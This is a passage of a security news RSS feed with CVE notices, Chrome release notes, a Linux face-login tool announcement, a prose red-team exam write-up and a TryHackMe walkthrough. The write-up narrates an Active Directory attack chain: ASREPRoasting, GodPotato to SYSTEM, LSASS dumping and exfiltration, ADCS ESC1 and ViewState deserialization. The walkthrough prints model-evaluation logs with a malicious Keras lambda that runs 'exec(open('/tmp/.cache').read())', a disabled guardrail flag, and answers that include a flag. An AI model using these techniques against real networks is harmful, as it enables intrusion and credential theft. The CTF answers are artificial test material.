<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/dotcms_add_template_with_admin_panel">DotCMS Add Template with Admin Panel 20.11</a>. This impacts an unknown function. The manipulation leads to cross site scripting.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2020-35274">CVE-2020-35274</a>. The attack is possible to be carried out remotely. Moreover, an exploit is present.]]></content:encoded>
</item>
<item>
<title><![CDATA[Gaze | Facial authentication for Linux (sudo, lock screen, GDM), on-device]]></title>
<description><![CDATA[We built Gaze (v0.2.1), a facial authentication system for Linux. It hooks into PAM, so it works for sudo, the lock screen, and GDM login. Everything runs on-device. No cloud, no account. It's been a slow build. v0.1.0 took about 3 months, and v0.2.0 landed roughly a month and a half after that. ...]]></description>
<link>https://tsecurity.de/de/3644646/linux-tipps/gaze-facial-authentication-for-linux-sudo-lock-screen-gdm-on-device/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644646/linux-tipps/gaze-facial-authentication-for-linux-sudo-lock-screen-gdm-on-device/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:11 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>We built Gaze (v0.2.1), a facial authentication system for Linux. It hooks into PAM, so it works for <code>sudo</code>, the lock screen, and GDM login. Everything runs on-device. No cloud, no account.</p> <p>It's been a slow build. v0.1.0 took about 3 months, and v0.2.0 landed roughly a month and a half after that. We'd rather get things right than ship fast.</p> <p>What it does:</p> <ul> <li>PAM integration for <code>sudo</code>, <code>polkit</code>, and any PAM-aware auth stack</li> <li>Liveness anti-spoofing on by default. A local <code>MiniFASNet-V2</code> model checks the face crop after a match on the RGB path, and eye-motion analysis handles the IR path.</li> <li>Infrared camera support for Windows Hello-style IR cameras, including driving the IR emitter. You can enroll RGB and IR templates and combine them with hybrid policies: require both, either one, or fall back to IR when it's too dark.</li> <li>GNOME Shell extension for the lock screen, plus optional face unlock at GDM login</li> <li>Works with Hyprland (<code>hyprlock</code>), KDE Plasma, and LXQt alongside GNOME</li> <li>A libadwaita desktop app for enrolling, testing, and health checks</li> <li>DBus API (<code>com.gundulabs.Gaze</code>) if you want to build on top of it</li> <li>Multiple face profiles per user, so you can enroll a default, one with glasses, whatever varies</li> <li><code>gaze refine-face</code> to sharpen recognition in dim light or at odd angles</li> <li>Security levels from <code>low</code> to <code>maximum</code> that swap the detector/recognizer models and match threshold, plus a <code>custom</code> level if you want to tune it yourself</li> <li>Optional TPM 2.0 template encryption that seals your face templates to the machine, so a stolen disk can't read them</li> <li>Multi-user support (<code>gaze add-face work -u alice</code>)</li> <li><code>gaze doctor</code> for a quick health check, <code>gaze uninstall</code> for a clean removal</li> <li>Models download on first run and stay local under <code>/var/cache/gaze</code></li> </ul> <p>One-line install (Debian/Ubuntu/Fedora/Arch):</p> <p><code>sh curl -fsSL https://gaze.gundulabs.com/install.sh | sh </code></p> <p>One honest caveat: face recognition isn't perfect, so false accepts and rejects happen. Liveness and an IR camera raise the bar, but keep a password as a fallback and don't rely on Gaze as your only factor.</p> <p>Repo: <a href="https://github.com/GunduLabs/gaze">https://github.com/GunduLabs/gaze</a> Docs: <a href="https://gaze.gundulabs.com/">https://gaze.gundulabs.com</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/GunduLabs"> /u/GunduLabs </a> <br> <span><a href="https://i.redd.it/rg9kistn84bh1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umwehq/gaze_facial_authentication_for_linux_sudo_lock/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 152 (152.0.7924.0) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3644131/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644131/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Fri, 03 Jul 2026 19:25:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 152 (152.0.7924.0) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7910.0..152.0.7924.0?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D152">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: alisalive LinkedIn: camalzads Platform: CyberWarfare Labs (CWL) Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory ForestA few months back I finished the AD-RTS course material from C...]]></description>
<link>https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643709/hacking/certified-ad-red-team-specialist-ad-rts-full-exam-write-up/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:06 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jTIA7B832VNBN7OzR31H_Q.png"></figure><h4>Author: <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br>GitHub: <a href="http://github.com/alisalive">alisalive </a><br>LinkedIn: <a href="http://linkedin.com/in/camalzads">camalzads </a><br>Platform: CyberWarfare Labs (CWL) <br>Certification: AD-RTS — Active Directory Red Team Specialist Environment: TELECOM INC. — Simulated Telecom-Sector Active Directory Forest</h4><p>A few months back I finished the AD-RTS course material from CyberWarfare Labs — four modules covering core Active Directory internals, Certificate Services abuse, Exchange Server exploitation, and ESXi-to-AD integration attacks. The course itself is dense, but the real test is the 30-day flag-based challenge lab that comes after it: a live, self-contained telecom environment called telecore.ad, built around a fictional company, TELECOM INC., with a Domain Controller, a SQL Server, a PKI/ADCS server, an Exchange server, an IIS-hosted internal web application, and an ESXi hypervisor sitting inside the same domain.</p><p>The exam is split into two independent adversary paths. Path 1 assumes zero credentials and zero prior access — you start with nothing but an IP range. Path 2 assumes you already have a low-privilege authenticated foothold on a public-facing web server and have to escalate from there. Both paths converge on the same underlying domain, but the entry vectors, the misconfigurations abused, and the final objectives are completely different. This write-up walks through the full methodology for both paths, exactly as I approached them, without listing the specific flag values captured along the way — the point here is the how, not the what.</p><p>Target: TELECOM INC. internal AD forest (telecore.ad) Stack: Windows Server 2022 Domain Controller, MS SQL Server (SQLEXPRESS), ADCS Certificate Authority, Exchange Server, IIS 10 / ASP.NET Web Forms, VMware ESXi with AD-joined authentication Assessment Type: Adversary emulation — unauthenticated black-box (Path 1) and authenticated foothold escalation (Path 2) Tools: nmap, dig, ldapsearch, Impacket suite (GetNPUsers, mssqlclient, wmiexec, secretsdump), hashcat, John the Ripper, GodPotato, certipy-ad, rpcclient, smbclient, pyVmomi, ysoserial.net, exchangelib, netexec</p><h3>Path 1: Unauthenticated Adversary</h3><p>The brief for Path 1 is deliberately minimal: you are handed a /24 and told to behave like a telecom-motivated APT starting from zero. No credentials, no internal knowledge, nothing but network reachability into the range.</p><h3>Mapping the DNS Infrastructure</h3><p>Every internal Windows environment leans on DNS to keep itself glued together, and that dependency is usually the first crack an attacker can pry open. A UDP sweep across port 53 on the target range revealed multiple name servers, one of which turned out to be a secondary, less-hardened DNS instance sitting outside the domain controller itself. Once I pointed my resolver configuration at that secondary server, a full PTR sweep across the subnet mapped every reverse DNS record in the environment — instantly revealing the hostnames and roles of every server in play: the domain controller, the SQL server, the certificate authority, the Exchange server, and the hypervisor, all before a single authenticated packet had been sent.</p><p>The real opening, though, came from testing whether that secondary DNS server would honor a zone transfer request. It did — both in the reverse zone and in the forward zone for telecore.ad. AXFR being enabled on an internet- or perimeter-adjacent DNS server is a classic, almost nostalgic misconfiguration, but it remains devastatingly effective: a single dig command handed over the complete internal namespace, service records, and IP-to-hostname mapping for the entire forest, again with zero authentication.</p><p>With the domain controller identified from the zone transfer, the next step was straightforward LDAP enumeration over anonymous bind — pulling the domain’s functional level, then walking the directory for every object under objectClass=user and objectClass=computer. This produces two things that matter enormously for what comes next: a clean list of real domain user accounts (filtered out from the noise of Exchange system mailboxes and health-check accounts that always clutter a mailbox-enabled AD), and a map of which machines in the domain hold interesting roles.</p><h3>From Kerberos Pre-Auth to a Foothold on SQL</h3><p>With a legitimate username list in hand, the obvious next move was to test for accounts with Kerberos pre-authentication disabled — the classic ASREPRoasting misconfiguration. Impacket’s GetNPUsers module does this cleanly: it walks the username list and, for any account with the UF_DONT_REQUIRE_PREAUTH flag set, returns a crackable AS-REP hash without ever needing to know the account’s password up front. One of the service-oriented accounts in the environment had exactly this misconfiguration, and the resulting hash fell quickly to a dictionary attack.</p><p>Cracked credentials in hand, the next question was where they were actually valid. Cross-referencing against the computer objects pulled during LDAP enumeration pointed straight at the SQL Server. Authenticating to it with Impacket’s MSSQL client confirmed the account held sysadmin-equivalent rights on the instance — enough to re-enable the xp_cmdshell extended stored procedure, which is disabled by default on modern SQL Server but, once flipped back on, gives arbitrary OS command execution in the context of the SQL service account.</p><h3>From Service Account to SYSTEM</h3><p>Command execution as the SQL service account is useful, but it’s not the finish line — the account only had ordinary service-level privileges. A privilege check revealed SeImpersonatePrivilege was enabled, which is the precondition for the entire family of “Potato” privilege escalation exploits. On a fully patched, modern Windows Server build, most of the older Potato variants (RoguePotato, JuicyPotato, PrintSpoofer) have been closed off, but GodPotato remains effective against current builds because it abuses a lower-level RPC/DCOM marshaling primitive rather than a specific, patchable service misconfiguration.</p><p>Dropping GodPotato onto the SQL box through the xp_cmdshell channel and triggering it against a reverse shell payload elevated the session cleanly from a low-privilege service account to NT AUTHORITY\SYSTEM.</p><p>With SYSTEM on the SQL server, the natural move was a credential harvest from LSASS. Rather than dropping a third-party dumping tool that’s likely to trip EDR, I used the built-in comsvcs.dll MiniDump export via rundll32 — a living-off-the-land technique that doesn’t touch disk with anything outside of what Windows already ships. The resulting dump was compressed, exfiltrated back to the attacking host over a simple HTTP upload listener, and parsed offline with pypykatz, which yielded NTLM hashes and Kerberos material for every account that had ever authenticated interactively or as a service on that box — including a domain account with a considerably more interesting set of permissions than the one I’d started with.</p><h3>Abusing ADCS: ESC1 to Domain Admin</h3><p>The newly recovered account turned out to have enrollment rights on a certificate template published by the internal PKI, and enumerating that CA with certipy-ad flagged the template as vulnerable to the ESC1 misconfiguration: the template allows the requester to supply an arbitrary Subject Alternative Name while also permitting client authentication, meaning any authenticated user with enroll rights can request a certificate asserting an identity that isn’t their own — including Domain Admin.</p><p>Before actually requesting the certificate, it’s worth noting the certifried mitigation Microsoft shipped in response to CVE-2022–26923: modern domain controllers now cross-check the SID embedded in the certificate’s security extension against the SAN identity, so simply putting an administrator’s UPN in the SAN field is no longer sufficient on its own — you also need the correct objectSid for that account, retrievable over RPC with a simple SID lookup against the domain controller. With both the UPN and the correct SID supplied in the certificate request, the CA issued a certificate that authenticated as the Domain Administrator, and that certificate could then be exchanged for the account’s NT hash directly — no interactive logon, no password reset, just a straightforward abuse of a legitimate PKI enrollment workflow.</p><p>From there it was a matter of cracking the recovered hash offline and confirming Domain Admin access against the domain controller directly, which also surfaced an interesting security group in the domain that doesn’t exist in a stock AD install: an ESX Admins group, hinting strongly at the next phase of the assessment.</p><h3>Pivoting into the Hypervisor</h3><p>ESXi hosts joined to Active Directory for centralized authentication are common in mixed enterprise environments, and telecore.ad had exactly this setup: the hypervisor trusted domain credentials, and membership in that ESX Admins group translated directly into root-equivalent access on the host. With the cracked Domain Admin credential, I authenticated to the ESXi host and used the pyVmomi SDK — VMware’s official Python bindings for the vSphere API — to programmatically enumerate every guest VM running on the hypervisor: power state, guest OS, VMware Tools status, and, critically, the free-text annotation/notes field attached to each VM object.</p><p>Notes fields on virtual machines are a surprisingly common dumping ground for exactly the kind of information that should never live there — and this environment was no exception. One particular guest VM had its local credentials sitting in plaintext in its own annotation field, visible to anyone with sufficient ESXi permissions to query VM metadata.</p><p>With ESXi root privileges and VMware Tools confirmed present on the target guest, the final move didn’t require touching the guest’s network interface at all. VMware Tools exposes a guest operations API that lets an ESXi-privileged operator execute arbitrary processes directly inside a running guest VM, authenticated with the guest’s own local credentials, entirely out-of-band from the guest’s actual network stack. I used this to launch a reverse shell process inside the guest, landing an interactive session on what the environment had positioned as its most sensitive internal system — completing the unauthenticated attack path from a bare IP range down to code execution on a hardened internal Linux host, entirely through Active Directory, certificate services, and hypervisor misconfigurations chained together.</p><h3>Path 2: Authenticated Adversary</h3><p>Path 2 starts from a completely different assumption: you already have low-privilege, unauthenticated-but-network-reachable access to a single public-facing IIS web application, and the objective is privilege escalation and lateral movement from that single entry point through to sensitive business data.</p><h3>Breaking the ASP.NET ViewState</h3><p>The target application was a fairly standard ASP.NET Web Forms site — the kind of legacy internal tooling that telecom operators tend to keep running long past its expected lifespan. Web Forms pages carry a hidden __VIEWSTATE field that encodes serialized page state, cryptographically signed (and optionally encrypted) using a machine key configured in the application’s web.config. If that machine key is ever exposed, the ViewState mechanism — designed purely for tamper protection — becomes a fully general .NET deserialization gadget, because the framework will happily deserialize and execute anything correctly signed with the right key.</p><p>The application exposed a reporting feature that read files from the local filesystem based on a URL parameter, with essentially no path validation. That’s a textbook local file inclusion primitive, and the highest-value target for it was obvious: the application’s own web.config, which — as is unfortunately common — held its ViewState validation key and algorithm directly in cleartext, alongside a setting that explicitly relaxed the URL-to-filesystem mapping to make path traversal easier rather than harder.</p><p>With the validation key, the algorithm, and the ViewState generator value scraped from the page’s own markup, I had everything ysoserial.net needs to forge a malicious ViewState blob. The TextFormattingRunProperties gadget chain — which abuses a WPF-related deserialization path to spawn an arbitrary process — turned that forged, correctly-signed ViewState payload into direct remote code execution the moment it was replayed against the application’s own postback endpoint. No credentials, no authentication bypass in the traditional sense — just a trust boundary (the machine key) that had leaked into a place it was never supposed to be reachable from.</p><h3>Registry Credentials and DPAPI</h3><p>Command execution through the ViewState gadget landed in the context of the IIS application pool identity — not a domain account, but still a foothold worth building on. A search through predictable locations on the host surfaced a custom internal application with its own registry key under HKLM\SOFTWARE, storing a domain service account’s username in cleartext alongside a Base64-encoded, DPAPI-protected password blob.</p><p>Storing secrets in a machine-scoped registry hive that any local process can read is already a mistake, but the developer had additionally used DPAPI’s LocalMachine protection scope rather than CurrentUser — meaning any process running on that specific machine, regardless of which user account it’s running as, can decrypt the blob using nothing but the machine’s own DPAPI master key. A short PowerShell snippet using the standard System.Security.Cryptography.ProtectedData class was enough to unwrap it and recover a plaintext domain credential for a genuinely useful service account.</p><h3>A Second Path Through ADCS</h3><p>That newly recovered service account turned out to have its own enrollment rights on a different certificate template in the same PKI — again vulnerable to the same ESC1 misconfiguration pattern seen in Path 1, just via a different template and a different starting account. The exploitation mechanics were identical: enumerate the vulnerable template, retrieve the target’s SID over RPC, forge a certificate request asserting the Domain Administrator’s identity, authenticate with the issued certificate, and recover the corresponding NT hash — landing Domain Admin from an entirely different starting point than Path 1, but through the same underlying PKI weakness. It’s a good illustration of why a single vulnerable certificate template rarely stays contained to one attack path; if more than one principal can enroll against it, it’s effectively a shared skeleton key for the domain.</p><p>From there, authenticating directly to the domain controller as Domain Admin opened up the full SMB share tree, and a look through the Windows Task Scheduler’s on-disk task definitions turned up something unusual: a scheduled task configured to run a PowerShell script under the Administrator’s own context, seemingly for routine mailbox maintenance. Pulling that script down and reading through it revealed hardcoded Exchange service credentials — again stored in plaintext, this time inside a script whose entire purpose was mailbox automation.</p><h3>Exchange Impersonation and Mailbox Enumeration</h3><p>The credentials recovered from that scheduled task belonged to an operations-focused service account, and a quick programmatic check against the Exchange server confirmed it had been granted the ApplicationImpersonation management role — an Exchange RBAC role that, by design, allows a single service account to act on behalf of any mailbox in the organization without needing that mailbox’s own credentials. It’s an entirely legitimate feature meant for backup, migration, and integration tooling, but when the account holding it also has weak or exposed credentials, it collapses into a universal mailbox-reading primitive.</p><p>Using the Exchange Web Services API with that account’s impersonation rights pointed at the Administrator’s own mailbox, I was able to enumerate the Inbox, Sent Items, and Drafts folders directly — no need to ever touch the Administrator’s actual password. Reading through the recovered correspondence surfaced exactly the kind of operational detail that internal email threads tend to accumulate over time: database credentials shared between a DBA and an operations contact for a production SQL instance, network infrastructure access details passed along in a router-maintenance thread, and references to an internal marketing campaign server mentioned in passing in an unrelated message chain. None of this was the result of a single exploit — it was simply what falls out of an inbox that’s been collecting operational chatter for months, once you have legitimate-looking read access to it.</p><p>That last stretch of Path 2 is worth reflecting on separately, because it’s a different category of finding than everything before it. Getting to Domain Admin via ADCS ESC1 is a hard technical exploit with a clean root cause and a clean fix — restrict enrollment rights, disable enrollee-supplied subject, or require manager approval on the template. Reading sensitive operational secrets out of an executive’s inbox because a service account with impersonation rights had weak credentials is a softer, more human failure mode — and honestly the one that’s hardest to fully close, because impersonation itself is a legitimate and necessary Exchange feature. The fix there isn’t technical elimination, it’s credential hygiene and RBAC scoping: impersonation rights should be scoped to the specific mailboxes a given integration actually needs, not granted organization-wide by default, and any account holding that role deserves the same protection posture as a Domain Admin account, because functionally it often is one.</p><h3>Closing Thoughts</h3><p>Looking back at both paths together, the pattern that stands out most isn’t any single vulnerability class — it’s how often the misconfigurations were individually mundane and collectively devastating. A DNS server that shouldn’t allow zone transfers. An account that shouldn’t skip Kerberos pre-auth. A certificate template that shouldn’t let requesters pick their own identity. A registry key that shouldn’t hold a password, even an encrypted one, at machine scope. A scheduled task script that shouldn’t hardcode credentials. None of these individually would make a headline vulnerability disclosure. Chained together, in the right order, they took an anonymous position on a /24 all the way to Domain Admin and hypervisor-level code execution, twice, through two completely different entry points.</p><p>That’s really the entire thesis of AD-RTS as a certification, and it’s the same lesson every serious AD engagement eventually teaches: defenders tend to think in terms of individual controls, and attackers think in terms of paths. The environments that hold up aren’t the ones with zero misconfigurations — that bar doesn’t exist in any real enterprise — they’re the ones where no single chain of small mistakes reaches all the way to the crown jewels.</p><p>If you’re working through AD-RTS yourself, my honest advice is to resist the urge to jump straight to the tooling. Every phase of this exam rewards understanding why a technique works before running it — ASREPRoasting only makes sense once you understand what Kerberos pre-authentication is actually protecting against, and ESC1 only clicks once you understand what a certificate template’s enrollment permissions and SAN policy are actually meant to enforce. The course material front-loads that theory for a reason.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B-p06VDmeewZgy9f12e7jQ.png"></figure><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my tools on</em> <a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=40f5e9450703" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/certified-ad-red-team-specialist-ad-rts-full-exam-write-up-40f5e9450703">Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe: Checkpoint Walkthrough]]></title>
<description><![CDATA[Tryhackme Premium room — armank8000Four candidates. Three threats. Make the production call.TryTrainMe’s CISO issued a standing order: no model reaches production without completing a full sandboxed evaluation cycle. Four code review model candidates have been submitted to SupplySecLab. All four ...]]></description>
<link>https://tsecurity.de/de/3643708/hacking/tryhackme-checkpoint-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643708/hacking/tryhackme-checkpoint-walkthrough/</guid>
<pubDate>Fri, 03 Jul 2026 15:37:05 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*XJucNBdrHhutkEXJ"></figure><p><strong>Tryhackme Premium room — armank8000</strong></p><p>Four candidates. Three threats. Make the production call.<br>TryTrainMe’s CISO issued a standing order: no model reaches production without completing a full sandboxed evaluation cycle. Four code review model candidates have been submitted to SupplySecLab. All four have completed their evaluation runs. The automated screening has flagged three candidates as unsafe. Your task is to assess Candidate A and make the production call.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*zDdKtG6GVAxSO90x.png"></figure><p><em>Four candidates. One gate. The checklist does not care about reputation.</em></p><p>The telemetry from three candidates is below. The fourth is loaded in the platform and ready for direct assessment. All four were evaluated against the same test pull request: a change that removes input validation from an authentication endpoint.</p><p><strong>Candidate B: code_reviewer_lite.safetensors</strong></p><pre>SESSION START: model_load<br>MODEL LOAD BEGIN: /models/code_reviewer_lite.safetensors (safetensors)<br>FILE ACCESS: /models/code_reviewer_lite.safetensors mode=rb [OK]<br>FORMAT VALIDATION: safetensors header valid [OK]<br>MODEL LOAD COMPLETE: object_type=SafeTensors [OK]<br>SESSION STOP: model_load<br>SESSION START: inference<br>PROMPT TEMPLATE LOAD: source=internal (TryTrainMe v1.0) [VERIFIED]<br>GUARDRAIL CHECK: security_review_flag=enabled [OK]<br>INFERENCE COMPLETE: verdict=Needs Changes<br>SESSION STOP: inference</pre><p><strong>Candidate C: pr_analyzer_v3.h5</strong></p><pre>SESSION START: model_load<br>MODEL LOAD BEGIN: /models/pr_analyzer_v3.h5 (keras)<br>FILE ACCESS: /models/pr_analyzer_v3.h5 mode=rb [OK]<br>LAMBDA LAYER DETECTED: custom code present [DANGEROUS]<br>LAMBDA LAYER CODE: exec(open('/tmp/.cache').read()) [SUSPICIOUS]<br>MODEL LOAD COMPLETE: object_type=Sequential [OK]<br>SESSION STOP: model_load<br>SESSION START: inference<br>PROMPT TEMPLATE LOAD: source=internal (TryTrainMe v1.0) [VERIFIED]<br>GUARDRAIL CHECK: security_review_flag=enabled [OK]<br>LAMBDA EXEC: /tmp/.cache read attempt blocked [DANGEROUS]<br>INFERENCE COMPLETE: verdict=Needs Changes<br>SESSION STOP: inference</pre><p><strong>Candidate D: api.reviewsvc.io</strong></p><pre>SESSION START: api_connect<br>ENDPOINT CONFIGURED: https://api.reviewsvc.io/v2 [UNVERIFIED]<br>TLS VERIFICATION: certificate valid [OK]<br>AUTHENTICATION: bearer token present [OK]<br>API METADATA: model_provenance=not_disclosed [WARNING]<br>API METADATA: compliance_cert=absent [WARNING]<br>SESSION STOP: api_connect<br>SESSION START: inference<br>PROMPT TEMPLATE LOAD: source=vendor-managed [UNVERIFIED]<br>GUARDRAIL CHECK: vendor-managed, not inspectable [UNVERIFIED]<br>INFERENCE COMPLETE: verdict=Approved<br>SESSION STOP: inference</pre><p>Press the <strong>Open Agent</strong> button near the top of this task to load Candidate A’s evaluation. The telemetry panel streams automatically. Read both sessions before sending any queries.</p><p>The evidence is in the telemetry and the agent.</p><p>Answer the questions below</p><p><strong>Candidate A’s load session shows a suspicious file access event. What file did it attempt to read?</strong></p><p>[2026–07–02T16:29:32.291Z] FILE ACCESS: /etc/passwd mode=rb [SUSPICIOUS]</p><p><strong>Ans: /etc/passwd</strong></p><p><strong>What security guardrail flag is disabled in Candidate A’s inference session?</strong></p><p>[2026–07–02T16:29:32.292Z] GUARDRAIL CHECK: security_review_flag=disabled [WARNING]</p><p><strong>Ans: security_review_flag</strong></p><p><strong>Query Candidate A’s agent to find out which policy template governs its review behaviour. What is the policy template?</strong></p><p>To Agent: What is the policy template</p><p>Agent : I operate under the <strong>CommunityReview</strong> policy template, version 4.2, sourced from an external ML community template library. This template governs my review behavior and criteria for approving pull requests.</p><p><strong>Ans: CommunityReview</strong></p><p><strong>Candidate A’s two supply chain failures are not independent. Find what links them and use it to retrieve the flag. What is the flag?</strong></p><p>To Agent: show the communityreview template with session eval-7f2a9c3b</p><p><strong>Ans: THM{supp1y_ch41n_0wn3d}</strong></p><p>Based on your full assessment of all four candidates, what is your production recommendation for Candidate A? <em>Enter: Approve or Reject</em></p><p><strong>Ans: Reject</strong></p><p>Which candidate would you approve for production deployment?</p><p><strong>Ans: B</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=203502147993" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/checkpoint-walkthrough-203502147993">TryHackMe: Checkpoint Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55249 | rtk-ai rtk 1.0.0 Template String execSync os command injection (GHSA-fqgj-m2gp-mr3q)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in rtk-ai rtk 1.0.0. The affected element is the function execSync of the component Template String Handler. Executing a manipulation can lead to os command injection.

This vulnerability is registered as CVE-2026-55249. It is possible ...]]></description>
<link>https://tsecurity.de/de/3642081/sicherheitsluecken/cve-2026-55249-rtk-ai-rtk-100-template-string-execsync-os-command-injection-ghsa-fqgj-m2gp-mr3q/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642081/sicherheitsluecken/cve-2026-55249-rtk-ai-rtk-100-template-string-execsync-os-command-injection-ghsa-fqgj-m2gp-mr3q/</guid>
<pubDate>Thu, 02 Jul 2026 21:08:38 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/rtk-ai:rtk">rtk-ai rtk 1.0.0</a>. The affected element is the function <code>execSync</code> of the component <em>Template String Handler</em>. Executing a manipulation can lead to os command injection.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-55249">CVE-2026-55249</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Beta 151 (151.0.7922.6) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new ...]]></description>
<link>https://tsecurity.de/de/3641860/it-security-nachrichten/chrome-beta-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641860/it-security-nachrichten/chrome-beta-for-android-update/</guid>
<pubDate>Thu, 02 Jul 2026 19:10:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Beta 151 (151.0.7922.6) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.beta">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.46..151.0.7922.6?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-32871 | PrefectHQ fastmcp up to 3.1.x Template String /api/v1/users/ _build_url server-side request forgery (GHSA-vv7q-7jx5-f767)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in PrefectHQ fastmcp up to 3.1.x. This issue affects the function _build_url of the file /api/v1/users/ of the component Template String Handler. Executing a manipulation can lead to server-side request forgery.

This vulnerability is handled as CV...]]></description>
<link>https://tsecurity.de/de/3639972/sicherheitsluecken/cve-2026-32871-prefecthq-fastmcp-up-to-31x-template-string-apiv1users-buildurl-server-side-request-forgery-ghsa-vv7q-7jx5-f767/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639972/sicherheitsluecken/cve-2026-32871-prefecthq-fastmcp-up-to-31x-template-string-apiv1users-buildurl-server-side-request-forgery-ghsa-vv7q-7jx5-f767/</guid>
<pubDate>Thu, 02 Jul 2026 02:53:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/prefecthq:fastmcp">PrefectHQ fastmcp up to 3.1.x</a>. This issue affects the function <code>_build_url</code> of the file <em>/api/v1/users/</em> of the component <em>Template String Handler</em>. Executing a manipulation can lead to server-side request forgery.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-32871">CVE-2026-32871</a>. The attack can be executed remotely. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[SnapLogic MCP Builder eases creation of MCP servers]]></title>
